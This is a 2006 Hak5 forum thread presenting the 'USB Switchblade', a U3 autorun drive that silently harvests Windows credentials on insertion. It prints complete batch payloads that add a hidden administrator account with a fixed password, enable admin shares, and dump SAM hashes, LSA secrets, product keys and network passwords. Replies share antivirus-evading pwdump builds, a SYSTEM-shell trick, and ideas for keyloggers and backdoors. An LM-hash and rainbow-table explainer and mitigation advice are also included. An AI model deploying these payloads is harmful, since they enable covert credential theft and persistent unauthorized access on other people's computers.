Darren Kitchen (Author) Posted September 5, 2006

From Hak5 episode 2x02, fourth segment: http://www.hak5.org/archives/138

Show notes:
Most Current: http://www.hak5.org/wiki/index.php?title=E...itchblade.22.29
Wiki page: http://www.hak5.org/wiki/index.php?title=USB_Switchblade

Show Notes 1.0 adapted from my CFH #437 notes: Instant USB Password Recovery Tool (The "USB Switchblade")

*Further development for this project can be found on the Hak5 forums at http://www.hak5.org/forums/viewtopic.php?t=2361

In this segment we'll overview a few of Microsoft Windows' security weaknesses and show how to build a custom USB key that will retrieve vital information from a target computer, necessary for auditing password strength. A major flaw in the way Windows stores password information is the use of the legacy LM, or LAN Manager, hash. While this hash is based on DES encryption, it is vulnerable to time-memory trade-off attacks due to its poor implementation. Our custom USB key uses new U3 technology to automatically and invisibly retrieve these weak hashes within seconds of being inserted into the target computer. From here the LM hashes can be tested against a set of rainbow tables using the popular RainbowCrack software and audited for password strength. We will also cover password best practices and prevention methods for this type of attack.

While the above paragraph may sound daunting at first, I will break it down into human terms and explain how and why this works, and what you can do to keep more secure passwords.

Overview of weaknesses in Windows password stores

The weakness that we will be exploiting is the way in which Windows stores password information. Since Windows 95, passwords have been stored in what is known as the LM, or LAN Manager, hash. This hash is based on DES encryption, which is a reasonably secure hash function; however, the way in which Microsoft implemented it makes it easily attacked for a few reasons.
First, the user's password is converted to all uppercase. Second, the password is padded or truncated to 14 bytes. Next, the password is split into two 7-byte halves and the values are used to create two DES keys with a constant ASCII string, resulting in two 8-byte values. Those two values are concatenated to form a 16-byte value, which is the LM hash. Basically what that all means is that your password is converted to all uppercase, split into two hashes, and stored in a DES-encrypted hash. This makes the hash susceptible to brute force or, in our case, Time-Memory Trade-Off attacks, which we'll get into in a few moments.

Overview of password auditing USB key

The beauty of our custom password hash retrieving USB key comes from its unique use of U3 technology. U3 is relatively new USB flash drive technology developed by U3 LLC in cooperation with SanDisk and M-Systems. More information about U3 can be found at the website http://www.u3.com

It basically uses a portion of the flash drive's memory as a virtual CD-ROM drive. This allows the Windows autorun feature to work properly, enabling us to run programs as soon as the drive is inserted into a computer. The autorun feature does not work properly on standard USB flash drives, so a U3-enabled USB flash drive is required to make this work. In this example we are using a U3-enabled SanDisk Cruzer Micro USB Flash Drive. This drive comes with U3 software enabling the use of applications like Skype directly from the flash drive. We will need to wipe out the U3 partition on this drive and replace it with our own payload. In this case we are using a payload developed by a Hak5 community member who goes by the name of MaxDamage. Max's payload contains a Visual Basic script and an autorun.inf file which will be flashed onto the U3 CD-ROM partition. The autorun.inf file launches the Visual Basic script, which in turn invisibly runs the exploit located on the normal flash drive partition.
To replace the existing U3 software on the U3-enabled SanDisk Cruzer Micro USB Flash Drive we will need two files: LPInstaller.exe and cruzer-autorun.iso. Both are hosted on the www.hak5.org website and are under further development on our forums and wiki. LPInstaller.exe is a piece of software developed by SanDisk for updating the U3 software on the flash drive. By default it will query a special website at SanDisk, download the latest U3 software, and flash the U3 partition on the USB flash drive. Since we want to install our own software, we simply need to place a file named cruzer-autorun.iso in the same directory as the LPInstaller.exe program and run it. This will replace the existing U3 software with the first part of our payload.

The second part of Max's payload is the set of scripts located on the normal partition of the USB flash drive. These are located within the hidden folders WIP/CMD/ and include DLLs, Visual Basic scripts, and executables, all run from a batch file. The batch file, go.cmd, will be run invisibly upon drive insertion and run the various password hash recovery tools. The most important part of this toolkit is the PwDump tool, which will retrieve the LM hashes from the local computer and save them to a log file on the normal flash drive partition within the /Documents/logfiles directory, with a file name based on the computer name and a .log extension. This file is created by go.cmd invisibly upon insertion and contains the LM hashes, as well as many other pieces of information. Further clarification on installation procedures for the password hash retrieving USB key can be found on the hak5.org website.

Overview of Time-Memory Trade-Off

Time-Memory Trade-Off, or TMTO, in terms of password cracking is a procedure used to reduce the amount of computation time needed to test hashes, normally using a lookup table.
The password cracking is done by comparing the password hash, in our case the LM hash, against a table of hashes and their known plaintext equivalents. The most popular tables for this type of password cracking are known as Rainbow Tables, used in conjunction with a tool called RainbowCrack. A full explanation of Time-Memory Trade-Off and Rainbow Tables is out of the scope of this article, so I encourage you to read the following articles if interested:
http://neworder.box.sk/newsread.php?newsid=13362
http://www.antsight.com/zsl/rainbowcrack/
http://en.wikipedia.org/wiki/Rainbow_table

There are many online services for comparing LM hashes against lookup tables, such as www.plain-text.info, www.md5lookup.com, and www.rainbowcrack-online.com. However, in this example we will be using our own rainbow tables with the RainbowCrack tool. One of the best places to obtain a set of rainbow tables is the website http://rainbowtables.shmoo.com/ operated by the Shmoo Group. We will also need the RainbowCrack software available from http://www.antsight.com/zsl/rainbowcrack/

Putting the tools to use

Once you have gathered the necessary tools and created your own password hash retrieving USB key using a compatible U3-enabled USB Flash Drive, we can put it to use and audit our computer's password strength. The first step is to insert the USB flash drive into a Windows computer and wait a few seconds for it to be recognized. Once recognized, the payload should run automatically and invisibly, creating a log file on the flash drive in the /documents/logfiles/ directory. From here our work is done and we can safely remove the USB flash drive. From this or another computer we can open the log file containing the LM hash and run it against our rainbow tables using the RainbowCrack tool.
To do so we will copy the LM hash of the user's password we wish to audit from the log file into a new file named pwfile.txt and move it to the directory where we store our rainbow tables and RainbowCrack tool. The command to test the hash against the tables is "rcrack *.rt -f pwfile". The RainbowCrack tool will then take a few minutes to run the LM hash against our rainbow tables and display the results. If we see the password in plaintext, we know that the password is weak and needs to be strengthened.

Mitigation

There are a few things that need to be explained about this method for password hash retrieval and cracking. First, physical access is needed to the Windows computer we will be testing. Second, the computer must be logged in with administrative access. And third, no anti-virus that would detect the payload can be running. In our tests Symantec Corporate Anti-Virus was able to detect the pwdump tool in the payload and prevent it from running. Many other anti-virus solutions may do the same.

Now, if we are successful in using this method to retrieve the LM hash, run it against our rainbow tables and find a match, the next step is to strengthen the password. To do this we must understand the limitations of the LM hash. While the LM hash may be Windows' Achilles' heel, it can easily be circumvented by two methods. First is to use a password of 15 characters or more, which is highly recommended. For further reading on long password best practices see the following websites on pass phrases:
http://www.microsoft.com/technet/community...gmt/sm1104.mspx
http://www.fourmilab.ch/javascrypt/pass_phrase.html

It is also worth mentioning that LM hashes can be disabled entirely on a Windows 2000 or higher computer by making a simple change to the registry.
For more information on preventing Windows from storing an LM hash see the following article in the Microsoft Knowledge Base: http://support.microsoft.com/kb/299656/

As an added precaution we can also disable the Windows autorun feature. More information on that procedure can be found in this Microsoft Knowledge Base article: http://support.microsoft.com/kb/q155217

For more information on any of these topics and the MaxDamage password hash retrieving payload visit the wiki at www.hak5.org/wiki/

Related Links
http://www.hak5.org
http://www.u3.com
http://neworder.box.sk/newsread.php?newsid=13362
http://www.antsight.com/zsl/rainbowcrack/
http://en.wikipedia.org/wiki/Rainbow_table
http://www.microsoft.com/technet/community...gmt/sm1104.mspx
http://www.fourmilab.ch/javascrypt/pass_phrase.html
http://support.microsoft.com/kb/299656/
http://support.microsoft.com/kb/q155217

Credits: MaxDamage, Amish

Thinking out loud

Feel free to use the wiki for development. Possibly filed under Hak5 Labs or something. Could be a good place for the Pandora hack and future projects.

Requirements
* physical access
* USB port
* autorun enabled
* no anti-virus (might be able to fix this)
* administrator privileges (might be able to automate system-level escalation)

MaxDamage's Solution

1. Loader
This replaces the U3 partition on the SanDisk Cruzer Micro with an invisible autorun loader
http://www.hak5.org/releases/2x02/switchbl...D1.0-loader.rar

2a. Payload 1.0
This payload gathers IP information, enables admin shares, adds an admin account, dumps the SAM, product keys, URL history, and LSA secrets
http://www.hak5.org/releases/2x02/switchbl...1.0-payload.rar

```bat
@echo off
REM Payload 1.0 (MaxDamage). All paths are on the flash drive, relative to its root.
if not exist \Documents md \Documents >nul
if not exist \Documents\logfiles md \Documents\logfiles >nul
set LOG=\Documents\logfiles\%computername%_load.log
echo ==================================================[Passive query bit] > %LOG% 2>&1
echo ==================================================[System info] >> %LOG% 2>&1
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %LOG% 2>&1
ipconfig /all >> %LOG% 2>&1
echo ==================================================[END System info] >> %LOG% 2>&1
echo ==================================================[Enabling Admin Shares] >> %LOG% 2>&1
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v AutoShareWks /t reg_dword /d 1 /f >> %LOG% 2>&1
echo ==================================================[END Enabling Admin Shares] >> %LOG% 2>&1
echo ==================================================[Add an administrative User Account] >> %LOG% 2>&1
REM Look-alike of the built-in SUPPORT_388945a0 account; UserList=0 hides it from the Welcome screen
net user /add SUPPORT_388945a1 inferno /fullname:"Microsoft Corporation Help Request" >> %LOG% 2>&1
net localgroup Administrators SUPPORT_388945a1 /add >> %LOG% 2>&1
echo MYUSER: SUPPORT_388945a1 Password: inferno >> %LOG% 2>&1
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388945a1 /t reg_dword /d 0 /f >> %LOG% 2>&1
echo ==================================================[END Add User] >> %LOG% 2>&1
echo ==================================================[Dump SAM] >> %LOG% 2>&1
.\pwdump 127.0.0.1 >> %LOG% 2>&1
echo ==================================================[Dump END SAM] >> %LOG% 2>&1
echo ==================================================[Dump Product Keys] >> %LOG% 2>&1
.\produkey /nosavereg /stext "\Documents\logfiles\%computername%_zzz.txt" /remote %computername% >> %LOG% 2>&1
copy \Documents\logfiles\%computername%* %LOG% >> nul
del /f /q "\Documents\logfiles\%computername%_zzz.txt"
echo ==================================================[Dump Product Keys END] >> %LOG% 2>&1
echo ==================================================[Dump URL History] >> %LOG% 2>&1
cscript //nologo .\DUH.vbs >> %LOG% 2>&1
echo ==================================================[Dump URL History END] >> %LOG% 2>&1
echo ==================================================[Dump LSA Secrets] >> %LOG% 2>&1
.\pspv.exe /stext "\Documents\logfiles\%computername%_LSA.log" >> %LOG% 2>&1
copy \Documents\logfiles\%computername%* %LOG% >> nul
del /f /q "\Documents\logfiles\%computername%_LSA.log"
echo ==================================================[Dump END LSA] >> %LOG% 2>&1
:End
exit
```

2b. Payload 1.1
This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history.
http://www.hak5.org/releases/2x02/switchbl...1.1-payload.rar

```bat
@echo off
REM Payload 1.1 (MaxDamage). Tools live in \WIP\CMD on the flash drive; the log goes to \Documents\logfiles.
if not exist \Documents md \Documents >nul
if not exist \Documents\logfiles md \Documents\logfiles >nul
cd \wip\cmd >nul
set LOG=\Documents\logfiles\%computername%.log
echo ************************************ > %LOG% 2>&1
echo ***********[System info]************ >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %LOG% 2>&1
ipconfig /all >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
echo ***********[Dump SAM]*************** >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
.\pwdump 127.0.0.1 >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
echo ***********[Dump Product Keys]****** >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
.\produkey /nosavereg /stext "\Documents\logfiles\%computername%_pk.log" /remote %computername% >> %LOG% 2>&1
copy %LOG%+\Documents\logfiles\%computername%_pk.log %LOG% >> nul
del /f /q "\Documents\logfiles\%computername%_pk.log" >nul
echo ************************************ >> %LOG% 2>&1
echo ***********[Dump LSA secrets]******* >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
.\pspv.exe /stext "\Documents\logfiles\%computername%_lsa.log" >> %LOG% 2>&1
copy %LOG%+\Documents\logfiles\%computername%_lsa.log %LOG% >> nul
del /f /q "\Documents\logfiles\%computername%_lsa.log" >nul
echo ************************************ >> %LOG% 2>&1
echo ***********[Dump Network PW]******** >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
.\netpass.exe /stext "\Documents\logfiles\%computername%_np.log" >> %LOG% 2>&1
copy %LOG%+\Documents\logfiles\%computername%_np.log %LOG% >> nul
del /f /q "\Documents\logfiles\%computername%_np.log" >nul
echo ************************************ >> %LOG% 2>&1
echo ***********[Dump messenger PW]****** >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
.\mspass.exe /stext "\Documents\logfiles\%computername%_ms.log" >> %LOG% 2>&1
copy %LOG%+\Documents\logfiles\%computername%_ms.log %LOG% >> nul
del /f /q "\Documents\logfiles\%computername%_ms.log" >nul
echo ************************************ >> %LOG% 2>&1
echo ***********[Dump URL History]******* >> %LOG% 2>&1
echo ************************************ >> %LOG% 2>&1
cscript //nologo .\DUH.vbs >> %LOG% 2>&1
:End
exit
```

2c. Payload 1.2 (Pwdump update from BrainKill)
http://www.hak5.org/releases/2x02/switchbl...1.2-payload.rar
Updates either package with a version of Pwdump that is not detected by Symantec Anti-Virus.

Amish's Solution

Amish's solution is similar to MaxDamage's; however, it does not require a U3-compatible USB drive. It relies on a little social engineering and gathers similar data.
I'll let Amish explain it in more detail.
http://www.hak5.org/releases/2x02/switchbl...1.0-payload.rar
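An added worked example, my own code rather than anything from the episode or the Switchblade payloads, serving both the LM hash description and the Time-Memory Trade-Off section of the notes above: the LM construction in Go using the standard library's crypto/des, followed by a toy rainbow table over one 7-byte half so the lookup a tool like RainbowCrack performs is visible end to end. The three-letter alphabet, chain length, reduction function and start points are illustrative choices of mine and appear nowhere on the page; real LM tables run the same mechanics over the full 7-character half. The two values printed for the empty password and for "password" are the well-known LM hashes that pwdump prints for those passwords.

```go
package main

import (
	"crypto/des"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"strings"
)

// lmMagic is the fixed plaintext that each half of the password "encrypts".
var lmMagic = []byte("KGS!@#$%")

// lmHalf is DES_k(lmMagic) with k = s zero-padded (or cut) to 7 bytes, spread
// over 8 key bytes with 7 bits each (the low bit is DES parity, ignored).
func lmHalf(s string) []byte {
	half := make([]byte, 7)
	copy(half, s)
	v := binary.BigEndian.Uint64(append([]byte{0}, half...))
	key := make([]byte, 8)
	for i := range key {
		key[i] = byte(((v >> uint(49-7*i)) & 0x7F) << 1)
	}
	c, _ := des.NewCipher(key) // 8-byte key, cannot fail
	out := make([]byte, 8)
	c.Encrypt(out, lmMagic)
	return out
}

// LMHash: uppercase, pad or truncate to 14 bytes, hash the two 7-byte halves
// independently, concatenate. The halves never interact, so each is attacked alone.
func LMHash(password string) string {
	buf := make([]byte, 14)
	copy(buf, strings.ToUpper(password)) // copy stops at 14 bytes
	h := append(lmHalf(string(buf[:7])), lmHalf(string(buf[7:]))...)
	return strings.ToUpper(hex.EncodeToString(h))
}

// Toy rainbow table over one LM half: 3 uppercase letters (26^3 candidates),
// chains of length 40. Real tables do the same over the full 7-character half.
const (
	alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
	plen     = 3
	chainLen = 40
)

// reduce maps a half hash back into the keyspace; adding the column index gives
// each column its own reduction function, which is what makes the table "rainbow".
func reduce(h []byte, col int) string {
	v := binary.BigEndian.Uint64(h) + uint64(col)
	out := make([]byte, plen)
	for i := range out {
		out[i] = alphabet[v%26]
		v /= 26
	}
	return string(out)
}

// Walk returns the candidate at column n of the chain that starts at start.
func Walk(start string, n int) string {
	for col := 0; col < n; col++ {
		start = reduce(lmHalf(start), col)
	}
	return start
}

// Build stores only endpoint -> start points; the hashes in between are
// recomputed at lookup time (the "time" side of the trade-off).
func Build(starts []string) map[string][]string {
	t := map[string][]string{}
	for _, s := range starts {
		end := Walk(s, chainLen)
		t[end] = append(t[end], s)
	}
	return t
}

// Lookup assumes target sits at column col, finishes that chain, then regenerates
// each stored chain with that endpoint and checks its candidate at column col.
func Lookup(t map[string][]string, target []byte) (string, bool) {
	for col := chainLen - 1; col >= 0; col-- {
		p := reduce(target, col)
		for j := col + 1; j < chainLen; j++ {
			p = reduce(lmHalf(p), j)
		}
		for _, s := range t[p] {
			if cand := Walk(s, col); string(lmHalf(cand)) == string(target) {
				return cand, true
			}
		}
	}
	return "", false
}

func main() {
	starts := []string{"AAA", "HAK", "FIV", "USB"} // constructed start points
	secret := Walk("HAK", 7)                       // a half that lies on one stored chain
	found, ok := Lookup(Build(starts), lmHalf(secret))
	fmt.Println(LMHash(""), LMHash("password"), secret, found, ok)
}
```

Because the halves are independent, the hash of "passwor" ends in the same 8 bytes as the hash of the empty password: the second half is a constant whenever the password is 7 characters or shorter, which is the first thing a cracker reads off a pwdump line. That, and the fact that Windows keeps no LM hash at all for 15 or more characters, is why the 15-character advice above works.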
brainkill Posted September 5, 2006

OK, so I'd like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on IRC if you have a better idea. nick == Brainkill
=====================
cooper Posted September 5, 2006

About the password stealing thing. It might be a good idea to try to copy over the Windows SAM file, its password database. Since the assumption is that you're already logged on as admin, chances are you can just copy the file. That's <your_windows_install_dir>\system32\config\sam by default. Also, when you create a rescue disk, the SAM file is typically copied along as well, so if you can't get the real SAM file, the one on the rescue disk might still contain valid passwords, or simply give you an idea about the passwords the various users on the system are prone to using. The rescue disk files are located in <your_windows_install_dir>\repair

My main question about this USB key is if it will work when the system is running a screensaver, or if it's locked but essentially logged on by the admin user?
brainkill Posted September 5, 2006

> OK, so I'd like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on IRC if you have a better idea. nick == Brainkill
> =====================

pwdump and its dependencies can be encrypted. I'll post links below to the programs. Standard Disclaimers Apply!
http://www.brainkill.net/hack/pwdump.exe
http://www.brainkill.net/hack/pwservice.exe
http://www.brainkill.net/hack/LsaExt.dll
=======================
Darren Kitchen (Author) Posted September 5, 2006

> OK, so I'd like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on IRC if you have a better idea. nick == Brainkill
> =====================
> pwdump and its dependencies can be encrypted. I'll post links below to the programs. Standard Disclaimers Apply!
> http://www.brainkill.net/hack/pwdump.exe
> http://www.brainkill.net/hack/pwservice.exe
> http://www.brainkill.net/hack/LsaExt.dll
> =======================

I can verify that the latest version of Symantec Anti-Virus Corporate Edition with the latest updates does not detect this now. Score one for brainkill!
sars960 Posted September 5, 2006

I've been watching Hak.5 for a while now, but it's my first post. I've downloaded Amish's version of the USB password recovery tool, but can't seem to figure out how to install and run it properly. I'm not very good at this kind of stuff, but I'm looking for some detailed instructions (if it's not too much to ask). Thanks!

sars960 Posted September 5, 2006

Within seconds after posting, I've checked Digg, and guess what, you've been dugg!
Duelus Posted September 5, 2006

As for not being able to run this without admin, here is my little contribution. It allows you to log in as SYSTEM; after running the script, cmd.exe will show, run explorer, and there you go. I hope someone can expand on it.

Code of admin.bat:

```bat
REM Kill the current shell, then start an interactive service: the cmd it spawns runs as LocalSystem
TASKKILL /F /IM "explorer.exe"
sc create testsvc binpath= "cmd /K start" type= own type= interact
sc start testsvc
del admin.bat
```
spektormax Posted September 5, 2006

brainkill, did you use that fun little packer?
Sparda Posted September 5, 2006

> As for not being able to run this without admin, here is my little contribution. It allows you to log in as SYSTEM; after running the script, cmd.exe will show, run explorer, and there you go. I hope someone can expand on it.
> Code of admin.bat:
> TASKKILL /F /IM "explorer.exe"
> sc create testsvc binpath= "cmd /K start" type= own type= interact
> sc start testsvc
> del admin.bat

That will only work using an admin account... limited user accounts cannot create services... sorry if that felt like a kick in the balls :/
spektormax Posted September 6, 2006

Haha, well in our school we have basically admin, teacher, and student. Teacher is a limited account, and student is limited with no privileges. You can do a net user /add username password to get a teacher account (it's not admin, but it's closer).
dyna Posted September 6, 2006

With Amish's, do you need a U3 flash drive or not? I can't seem to get this to work on my Cruzer Mini (doesn't have U3). Can anyone help me out?
Darren Kitchen (Author) Posted September 6, 2006

Amish's technique does not require a U3 drive. I've tested it and had it work just fine. I'm too exhausted right now to check. Amish: could you take a look and maybe explain your technique here? Thx, D
oomonkey Posted September 6, 2006

I have a U3 4GB stick and I was trying to use this technique, but I keep getting this error: "0x00e70064 reference memory at 0x00e70064. memory could not be written". This instance causes me to shut down and happens on my PC and laptop. Thoughts?
Vext Posted September 6, 2006

Hello,
Are there any loaders out that can load this software on a Memorex drive? I have the Memorex Mini TravelDrive U3 and can't seem to find a loader for it.
Thanks,
Vext
sentinel Posted September 6, 2006

I haven't tried the other ones, but I noticed there's a problem with the paths in Amish's version. If you go into all of the batch files and change all instances of the following, it works.
"batexe" to "" (nothing)
"nircmd.exe" to "..\nircmd.exe"
"dump" to "..\Dump"
I think that's everything.

This reminds me of the program creddump, which does some similar stuff but not as detailed and only to a text file.
aznrocket Posted September 6, 2006

Huh, just curious how difficult it would be to add a feature to this switchblade: the capacity to copy files OFF of the computer you plug it into (e.g. documents, MSN Messenger logs, etc.), while maintaining its stealthiness.
xyber411 Posted September 6, 2006

OK, here's a thought: all this on an iPod... now that's the way to be stealthy... you're just trying to listen to your music on the computer... :) And with that comes a lot of other things you can do as well... like possibly load multiple fake disks? Tell me if it's possible to do all this stuff with it:
1. record LM hashes (obviously)
2. install backdoor (like UltraVNC)
3. install a smart keylogger
4. disable firewalls/UPnP tunnel through them
5. disable antivirus/antispyware
6. install Folding@home & attach to a group
7. record email, .xls, .qdb, .mny, .doc, .qdf, .eml, & .jpg from computer
And to top it all off, make a user interface to turn on and off each of the features within the install, so that you do not have to harm a computer if you do not want to. I think it would be possible, and even almost easy, seeing as all the software is already available... it's just a matter of stitching it all together in a way that works with almost every computer out there... Oh, and most companies without an entire division dedicated to IT don't have administrator passwords... quite frankly, they mostly (at least in Houston, TX) ask you not to password anything administrator, in hopes that they can switch outsourcing companies later on if need be. I agree with all of you that that's a bad practice, but hey, the customer gets what the customer wants, right? lol

Heh, I think I just came up with the iBlade.
Inkyskin_UK Posted September 6, 2006

A while back I wrote a small app in C# that keylogs and takes screenshots every 30 or so seconds, and then mails them once they have reached a certain size if there is net access. It doesn't need installing, just adding to the startup registry once copied to the target PC. That can be done with a tiny app very easily too, if auto-run from something. You reckon that might be possible with this hack?
amish Posted September 6, 2006

Stupid website, had to create an account just to write this message. Right, so yes, my solution does NOT need U3 technology; basically you should just unzip it to the root of your memory stick and it should work correctly. I made this just for my use mainly, but I sent it to Darren, and he showed it. I think a quick fix was provided, but I will add more features to it at later dates, so yeah. Basically the file runs a batch script that creates a folder called the computername in the dump folder. In there it saves the different types of files, history and stuff. You can get more programs that you can put into the script from www.nirsoft.net

That's it
~Amish

Sorry for the shabby coding, I'll update it soon. I really need to update it because school is starting :)

*EDIT* I just tested the rar from the links Darren gave and it works fine on my memory stick. It's dumping the files just fine.
DLSS Posted September 6, 2006

Avast doesn't like it :( and wigs out
Darren Kitchen (Author) Posted September 6, 2006

> Huh, just curious how difficult it would be to add a feature to this switchblade: the capacity to copy files OFF of the computer you plug it into (e.g. documents, MSN Messenger logs, etc.), while maintaining its stealthiness.

It wouldn't be hard to program in, but I rather like it the way it is, since it's actually way more stealthy. As a systems administrator, if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used.
vehlewa1 Posted September 6, 2006

Great tool, but I'm getting errors on the DUMP SAM portion:
Logon to \\127.0.0.1\ADMIN$ failed: code 53
Or
Logon to \\127.0.0.1\ADMIN$ failed: code 1231
Anyone else having similar problems?
Sparda Posted September 6, 2006

That could be caused by a firewall or Windows file sharing being disabled. I'm not familiar with the error codes and so can't say for sure.
vehlewa1 Posted September 6, 2006

File sharing is enabled, and even with the firewall and anti-virus turned off I'm still getting the same errors. It seems to work great pulling all of my passwords from applications, but it won't even generate the hash to run against rainbow..